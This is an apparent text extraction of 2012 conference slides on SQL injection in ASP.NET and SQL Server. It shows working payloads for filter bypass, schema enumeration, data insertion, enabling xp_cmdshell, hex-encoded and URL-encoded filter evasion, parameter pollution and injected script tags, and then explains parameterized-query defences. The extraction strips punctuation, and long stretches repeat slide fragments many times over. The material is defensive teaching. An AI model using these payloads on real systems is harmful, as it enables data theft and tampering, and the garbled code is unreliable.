Understanding and Preventing SQL Injection · –Bypass the filter: ... INFORMATION_SCHEMA.COLUMNS...

abcdrsquo DROP TABLE PRESENTATIONS --

AKA SQL Injection the fast fun and easy way to ruin someonersquos day

Columbus Code Camp 2012

Kevin Feasel feaselklgmailcom

Understanding and Preventing SQL Injection

Who Am I

bull Database Administrator ndash Former web developer

ndash SQL Server DBA

ndash Currently working for Aetna bull Standard employer

disclaimer

bull Security Nut

bull Cyclist

bull Occasional world traveler

What Is SQL Injection

bull Injecting code in a manner the application developers did not expect

ndash Example your text box populates Parameter to do a lookup on a table Bad guy overloads Parameter to perform some unexpected operation

Why Should I Care

bull Not everyone is as nice as Good Guy Greg bull By 2006 web application vulnerabilities had

become more popular than buffer overflows httpcwemitreorgdocumentsvuln-trendsindexhtml ndash Cross-site scripting 1 SQL Injection 2

bull SQL Injection now 1 httpswwwowasporgindexphpTop_10_2010-Main

bull Imperva (2011) 83 of successful data breaches involve SQLi

Companies Which Should Have Cared

Has Sony Been Hacked This Week

But Irsquom Just One Man What Can I Do

bull As an attacker ndash Get schema information ndash Get protected data ndash Perform ldquoadministrativerdquo tasks

bull Create bogus user accounts (including admins) bull Create drop alter tables or views bull Delete update or insert data

ndash Run arbitrary executable code

bull As a defender ndash Protecting against SQL injection is stupid easy in

ASPNET

Jumping Right In

bull Defense requires knowledge

ndash To defend against SQL injection we must know how to perform SQL injection

bull Demo Setup

If you know the enemy and know yourself you need not fear the result of a hundred battles If you know yourself but not the enemy for every victory gained you will also suffer a defeat If you know neither the enemy nor yourself you will succumb in every battle ndash Sun Tzu The Art of War

Danger Will Robinson

Need a reason to update your resume Try putting this code on a production machine Goofus would bull Hack naked bull Exploit external sites bull Point out that reacutesumeacute

is spelled with e-acutes

Demo Time Put On Your Safety Goggles

bull Starting in SQL Server Management Studio

ndash Treat this as your lab

bull Open up SQL Profiler

ndash Watch the actual queries as they pass through

bull Get rolling with Demo 1

What Went Wrong

bull SQL injection works by getting lsquooutsidersquo the parameter

bull We werenrsquot able to

bull Lesson 1 canrsquot inject static SQL directly

bull Dynamic SQL ndash Ad hoc query

ndash T-SQL Dynamic SQL

Demo 2 Win Or Yoursquore Out Of The Family

bull Try this again using dynamic SQL

bull Survey says Success

bull Lesson 2 Using unsecured dynamic SQL we can successfully attack

bull Now wersquore ready to look at practical applications

Anatomy of a SQL injection attack

bull Basic SQL query looks like ldquoselect [cols] from [table] where [filter] like

lsquordquo + Filter + ldquorsquordquo

bull SQL comment line --

bull Example of a potential attack Filter = ldquoboorsquo OR 1 = 1 --rdquo

bull Turns into ldquoselect [cols] from [table] where [filter] like

lsquoboorsquo OR 1 = 1 --rdquo

The Naiumlve Developer

bull Basic task load a grid based upon filtering criteria entered into a text box

bull Our naiumlve developer hits the Googles and finds out how to use a SqlDataReader

bull The code works searches are successful ndash Even checks the filter to make

sure a value exists

Having Fun With The Naiumlve Developer

bull f OR 1 = 1--

ndash Bypass the filter list all records

bull Not fun enough Gimme more bull SHOOOO UNION select TABLE_SCHEMA + +

TABLE_NAME 1 1 from INFORMATION_SCHEMATABLES--

ndash Pick a name which doesnrsquot exist now we have a list of tables

bull SHOOOO UNION select COLUMN_NAME + + DATA_TYPE case when IS_NULLABLE = NO then 0 else 1 end ORDINAL_POSITION from INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME = ProductSubcategory and TABLE_SCHEMA = Production-- ndash Recon on a particular table

bull SHOOOO UNION select Name ProductSubcategoryID ProductCategoryID from ProductionProductSubcategory-- ndash Looking at the actual data in that table


bull SHOOOO insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 Evil Hacker Subcategory newid() current_timestamp)-- ndash Boom Exploit complete

bull nada exec sp_configure show advanced options 1 reconfigure exec sp_configure xp_cmdshell 1 reconfigure -- ndash Turn on xp_cmdshell letting us run external apps

Our Developerrsquos Response

bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates

bull More internet searching dev learns about blacklisting and creates a filter for his filter

ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish

In Retrospecthellip

bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory

Back To The Drawing Board

bull Need a slightly less naiumlve approach to filtering

bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium

bull Problem yoursquore doing it wrong

bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME

1 1 from INFORMATION_SCHEMATABLES--

ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0

150 Copy-Pastes Laterhellip

bull After adding various permutations of SQL commands + separatorshellip

bull declare shmoo varchar(8000) set

shmoo =

CAST(0x73656C656374095441424C455F5343

48454D41202B20272E27202B205441424C455

F4E414D45206173204E616D652C2031206173

2049734163746976652C203120617320536F7

2744F726465722066726F6D20494E464F524D

4154494F4E5F534348454D412E5441424C455

3 as varchar(8000)) exec(shmoo)

Translating The Varbinary

bull select cast(select

TABLE_SCHEMA + +

TABLE_NAME as Name 1 as

IsActive 1 as SortOrder from

INFORMATION_SCHEMATABLES as

varbinary(8000))

bull Important note this wonrsquot

combine data together

ndash Varbinary runs are better for insertupdatedelete operations

Other Fun Stuff We Can Do

bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this

looks suspiciously like the beginning of a cross-site scripting attack


select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))

Querystring Injection

bull Helpful table to understand querystring injection

Hex Code Character

09 Tab

20 Space

25

27 lsquo

2B +

2C

2D -

2E

3D =


bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo

bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo


bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip

bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D

HTTP Parameter Pollution

bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas

bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search

bull This can be used for evil ndash Any guesses how


bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D

ndash 2F2A =

ndash Translates to ldquoselect table_schemahelliprdquo


bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different

waysmdashconcatenate ignore all but the last etc

Effects On Different Platforms

httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf

Doing It Right Parameterized Queries

bull The right way to do it

ndash All parameters created using SqlParamter

ndash Not necessary to use stored procedures though in SQL Server this is preferable

bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue

bull Secure Query-Driven Test not susceptible either

Adding Dynamic SQL Into The Mix

bull Basic insecure dynamic SP bull create procedure BadProc

Filter nvarchar(500)

as

declare sql varchar(250)

set sql = lsquoselect from table where

Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo

exec(sql)

bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized

Attacking Insecure Dynamic SPs

bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS

bull exec BadProc Filter=SHOOOO

UNION select TABLE_SCHEMA +

+ TABLE_NAME 1 1 from

INFORMATION_SCHEMATABLES--

bull Parameterized queries prevent this from being an issue in ASPNET

Protecting Your Dynamic SPs

bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE

bull Include the parameter as a parameter inside the sql to run

bull Example declare sql nvarchar(max) set sql = select ProductSubcategory

ID ProductCategoryID

Name from ProductionProductSubcatego

ry where Name like Filter

exec sp_executesql sql NFilter

varchar(200) Filter

bull Once you do this you are completely safe from SQL injection

Recap What To Do

bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL

bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number

Social Security Number) bull Blacklists usually donrsquot work but whitelists can

bull Create limited-access accounts for web applications bull Constraints in UI business objects and database

ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me

Next Steps

bull Automation

ndash Havij (most popular easy GUI)

ndash Sqlmap (my favorite)

ndash BSQL Hacker (blind SQL injection)

ndash BBQSQL (Python-based blind SQL injection)

ndash Fast-Track (Metasploit module)

ndash Plenty more where this came from

bull Really evil stuff

QampA


Who Am I

bull Database Administrator ndash Former web developer

ndash SQL Server DBA

ndash Currently working for Aetna bull Standard employer

disclaimer

bull Security Nut

bull Cyclist

bull Occasional world traveler




Why Should I Care












ASPNET

Jumping Right In



bull Demo Setup











What Went Wrong






















sure a value exists


bull f OR 1 = 1--














In Retrospecthellip












shmoo =

CAST(0x73656C656374095441424C455F5343

48454D41202B20272E27202B205441424C455

F4E414D45206173204E616D652C2031206173

2049734163746976652C203120617320536F7

2744F726465722066726F6D20494E464F524D

4154494F4E5F534348454D412E5441424C455




TABLE_SCHEMA + +




varbinary(8000))











Hex Code Character

09 Tab

20 Space

25

27 lsquo

2B +

2C

2D -

2E

3D =













ndash 2F2A =
















as




exec(sql)

















varchar(200) Filter


Recap What To Do






Next Steps

bull Automation








QampA





Why Should I Care












ASPNET

Jumping Right In



bull Demo Setup











What Went Wrong






















sure a value exists


bull f OR 1 = 1--














In Retrospecthellip












shmoo =

CAST(0x73656C656374095441424C455F5343

48454D41202B20272E27202B205441424C455

F4E414D45206173204E616D652C2031206173

2049734163746976652C203120617320536F7

2744F726465722066726F6D20494E464F524D

4154494F4E5F534348454D412E5441424C455




TABLE_SCHEMA + +




varbinary(8000))











Hex Code Character

09 Tab

20 Space

25

27 lsquo

2B +

2C

2D -

2E

3D =













ndash 2F2A =
















as




exec(sql)

















varchar(200) Filter


Recap What To Do






Next Steps

bull Automation








QampA









ASPNET

Jumping Right In



bull Demo Setup











What Went Wrong






















sure a value exists


bull f OR 1 = 1--














In Retrospecthellip












shmoo =

CAST(0x73656C656374095441424C455F5343

48454D41202B20272E27202B205441424C455

F4E414D45206173204E616D652C2031206173

2049734163746976652C203120617320536F7

2744F726465722066726F6D20494E464F524D

4154494F4E5F534348454D412E5441424C455




TABLE_SCHEMA + +




varbinary(8000))











Hex Code Character

09 Tab

20 Space

25

27 lsquo

2B +

2C

2D -

2E

3D =













ndash 2F2A =
















as




exec(sql)

















varchar(200) Filter


Recap What To Do






Next Steps

bull Automation








QampA


Jumping Right In



bull Demo Setup











What Went Wrong






















sure a value exists


bull f OR 1 = 1--














In Retrospecthellip












shmoo =

CAST(0x73656C656374095441424C455F5343

48454D41202B20272E27202B205441424C455

F4E414D45206173204E616D652C2031206173

2049734163746976652C203120617320536F7

2744F726465722066726F6D20494E464F524D

4154494F4E5F534348454D412E5441424C455




TABLE_SCHEMA + +




varbinary(8000))











Hex Code Character

09 Tab

20 Space

25

27 lsquo

2B +

2C

2D -

2E

3D =













ndash 2F2A =
















as




exec(sql)

















varchar(200) Filter


Recap What To Do






Next Steps

bull Automation








QampA











What Went Wrong






















sure a value exists


bull f OR 1 = 1--














In Retrospecthellip












shmoo =

CAST(0x73656C656374095441424C455F5343

48454D41202B20272E27202B205441424C455

F4E414D45206173204E616D652C2031206173

2049734163746976652C203120617320536F7

2744F726465722066726F6D20494E464F524D

4154494F4E5F534348454D412E5441424C455




TABLE_SCHEMA + +




varbinary(8000))











Hex Code Character

09 Tab

20 Space

25

27 lsquo

2B +

2C

2D -

2E

3D =













ndash 2F2A =
















as




exec(sql)

















varchar(200) Filter


Recap What To Do






Next Steps

bull Automation








QampA


















sure a value exists


bull f OR 1 = 1--














In Retrospecthellip












shmoo =

CAST(0x73656C656374095441424C455F5343

48454D41202B20272E27202B205441424C455

F4E414D45206173204E616D652C2031206173

2049734163746976652C203120617320536F7

2744F726465722066726F6D20494E464F524D

4154494F4E5F534348454D412E5441424C455




TABLE_SCHEMA + +




varbinary(8000))











Hex Code Character

09 Tab

20 Space

25

27 lsquo

2B +

2C

2D -

2E

3D =













ndash 2F2A =
















as




exec(sql)

















varchar(200) Filter


Recap What To Do






Next Steps

bull Automation








QampA



bull f OR 1 = 1--














In Retrospecthellip












shmoo =

CAST(0x73656C656374095441424C455F5343

48454D41202B20272E27202B205441424C455

F4E414D45206173204E616D652C2031206173

2049734163746976652C203120617320536F7

2744F726465722066726F6D20494E464F524D

4154494F4E5F534348454D412E5441424C455




TABLE_SCHEMA + +




varbinary(8000))











Hex Code Character

09 Tab

20 Space

25

27 lsquo

2B +

2C

2D -

2E

3D =













ndash 2F2A =
















as




exec(sql)

















varchar(200) Filter


Recap What To Do






Next Steps

bull Automation








QampA









In Retrospecthellip












shmoo =

CAST(0x73656C656374095441424C455F5343

48454D41202B20272E27202B205441424C455

F4E414D45206173204E616D652C2031206173

2049734163746976652C203120617320536F7

2744F726465722066726F6D20494E464F524D

4154494F4E5F534348454D412E5441424C455




TABLE_SCHEMA + +




varbinary(8000))











Hex Code Character

09 Tab

20 Space

25

27 lsquo

2B +

2C

2D -

2E

3D =













ndash 2F2A =
















as




exec(sql)

















varchar(200) Filter


Recap What To Do






Next Steps

bull Automation








QampA












shmoo =

CAST(0x73656C656374095441424C455F5343

48454D41202B20272E27202B205441424C455

F4E414D45206173204E616D652C2031206173

2049734163746976652C203120617320536F7

2744F726465722066726F6D20494E464F524D

4154494F4E5F534348454D412E5441424C455




TABLE_SCHEMA + +




varbinary(8000))











Hex Code Character

09 Tab

20 Space

25

27 lsquo

2B +

2C

2D -

2E

3D =













ndash 2F2A =
















as




exec(sql)

















varchar(200) Filter


Recap What To Do






Next Steps

bull Automation








QampA




TABLE_SCHEMA + +




varbinary(8000))











Hex Code Character

09 Tab

20 Space

25

27 lsquo

2B +

2C

2D -

2E

3D =













ndash 2F2A =
















as




exec(sql)

















varchar(200) Filter


Recap What To Do






Next Steps

bull Automation








QampA









Hex Code Character

09 Tab

20 Space

25

27 lsquo

2B +

2C

2D -

2E

3D =













ndash 2F2A =
















as




exec(sql)

















varchar(200) Filter


Recap What To Do






Next Steps

bull Automation








QampA














ndash 2F2A =
















as




exec(sql)

















varchar(200) Filter


Recap What To Do






Next Steps

bull Automation








QampA
















as




exec(sql)

















varchar(200) Filter


Recap What To Do






Next Steps

bull Automation








QampA

















varchar(200) Filter


Recap What To Do






Next Steps

bull Automation








QampA


Recap What To Do






Next Steps

bull Automation








QampA


Next Steps

bull Automation








QampA


QampA


Understanding and Preventing SQL Injection · –Bypass the filter: ... INFORMATION_SCHEMA.COLUMNS...

Documents

Transcript of Understanding and Preventing SQL Injection · –Bypass the filter: ... INFORMATION_SCHEMA.COLUMNS...